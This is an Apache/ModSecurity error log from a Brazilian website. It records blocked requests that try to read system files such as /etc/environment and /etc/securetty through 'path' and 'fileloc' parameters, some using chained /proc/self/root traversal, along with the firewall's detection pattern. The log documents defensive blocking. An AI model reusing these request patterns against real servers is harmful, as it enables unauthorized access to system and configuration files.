[Thu Mar 19 11:45:51.867929 2026] [:error] [pid 15826:tid 140411741927168] [client 57.141.18.64:37126] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/securetty"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMH-oXxyEfFpUF8f8USQAAAUA"]
[Thu Mar 19 11:45:52.255458 2026] [:error] [pid 19093:tid 140411574073088] [client 74.7.241.31:51358] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMIF_V7PWP6ixUYl7DSwAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:45:52.605068 2026] [:error] [pid 19093:tid 140411725141760] [client 57.141.18.96:37144] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMIF_V7PWP6ixUYl7DTAAAAoI"]
[Thu Mar 19 11:45:52.666859 2026] [:error] [pid 19093:tid 140411590858496] [client 57.141.18.70:37146] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMIF_V7PWP6ixUYl7DTQAAApI"]
[Thu Mar 19 11:45:53.075979 2026] [:error] [pid 17653:tid 140411641214720] [client 57.141.18.54:37156] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/percona-server.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMIcdf6f5d65gmYZR-VgAAAsw"]
[Thu Mar 19 11:45:53.518132 2026] [:error] [pid 14269:tid 140411590858496] [client 57.141.18.105:37168] [client 57.141.18.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMIQbLMZ6AikZjR9Vj0gAAABI"]
[Thu Mar 19 11:45:53.539006 2026] [:error] [pid 14269:tid 140411666392832] [client 57.141.18.34:37170] [client 57.141.18.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMIQbLMZ6AikZjR9Vj0wAAAAk"]
[Thu Mar 19 11:45:53.751285 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.241.31:51374] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMIeoXxyEfFpUF8f8USwAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:45:54.092245 2026] [:error] [pid 17653:tid 140411691570944] [client 57.141.18.4:37178] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/man_db.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMIsdf6f5d65gmYZR-WAAAAsY"]
[Thu Mar 19 11:45:54.353453 2026] [:error] [pid 19093:tid 140411658000128] [client 74.7.243.128:49284] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMIl_V7PWP6ixUYl7DTwAAAoo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:45:54.655685 2026] [:error] [pid 31803:tid 140411649607424] [client 57.141.18.75:37190] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMIuyqAr6etmhZHNpm0AAAAEs"]
[Thu Mar 19 11:45:54.697807 2026] [:error] [pid 30077:tid 140411716749056] [client 57.141.18.72:37192] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMIvu8EFLIOrSqIput8wAAAkM"]
[Thu Mar 19 11:45:55.031982 2026] [:error] [pid 17653:tid 140411658000128] [client 57.141.18.105:37204] [client 57.141.18.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.updated"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMI8df6f5d65gmYZR-WwAAAso"]
[Thu Mar 19 11:45:55.055245 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.241.31:51382] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMI8df6f5d65gmYZR-XAAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:45:55.395063 2026] [:error] [pid 30077:tid 140411733534464] [client 57.141.18.41:37216] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rpc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMI_u8EFLIOrSqIput9AAAAkE"]
[Thu Mar 19 11:45:55.871482 2026] [:error] [pid 30077:tid 140411708356352] [client 57.141.18.22:37226] [client 57.141.18.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMI_u8EFLIOrSqIput9QAAAkQ"]
[Thu Mar 19 11:45:56.362275 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.241.31:51384] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMJPu8EFLIOrSqIput9gAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:45:56.482843 2026] [:error] [pid 14269:tid 140411641214720] [client 57.141.18.46:37242] [client 57.141.18.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMJAbLMZ6AikZjR9Vj1gAAAAw"]
[Thu Mar 19 11:45:56.599904 2026] [:error] [pid 14269:tid 140411691570944] [client 57.141.18.78:37248] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/favicon.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMJAbLMZ6AikZjR9Vj1wAAAAY"]
[Thu Mar 19 11:45:56.849175 2026] [:error] [pid 31803:tid 140411725141760] [client 57.141.18.47:37256] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/adjtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMJOyqAr6etmhZHNpm0gAAAEI"]
[Thu Mar 19 11:45:57.334702 2026] [:error] [pid 14269:tid 140411699963648] [client 57.141.18.72:37270] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inputrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMJQbLMZ6AikZjR9Vj2AAAAAU"]
[Thu Mar 19 11:45:57.398725 2026] [:error] [pid 30077:tid 140411624429312] [client 57.141.18.27:37274] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pkcs11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMJfu8EFLIOrSqIput-QAAAk4"]
[Thu Mar 19 11:45:57.752390 2026] [:error] [pid 14269:tid 140411540502272] [client 57.141.18.4:37280] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyslog.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMJQbLMZ6AikZjR9Vj2QAAABg"]
[Thu Mar 19 11:45:57.912370 2026] [:error] [pid 14269:tid 140411574073088] [client 74.7.241.31:32790] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMJQbLMZ6AikZjR9Vj2gAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:45:58.580286 2026] [:error] [pid 27293:tid 140411699963648] [client 57.141.18.48:37292] [client 57.141.18.48] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMJv-YZRR_7pZ7nDKSKQAAA8U"]
[Thu Mar 19 11:45:58.787957 2026] [:error] [pid 27293:tid 140411725141760] [client 57.141.18.75:37298] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMJv-YZRR_7pZ7nDKSKgAAA8I"]
[Thu Mar 19 11:45:59.242032 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.241.31:32794] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMJ-yqAr6etmhZHNpm1AAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
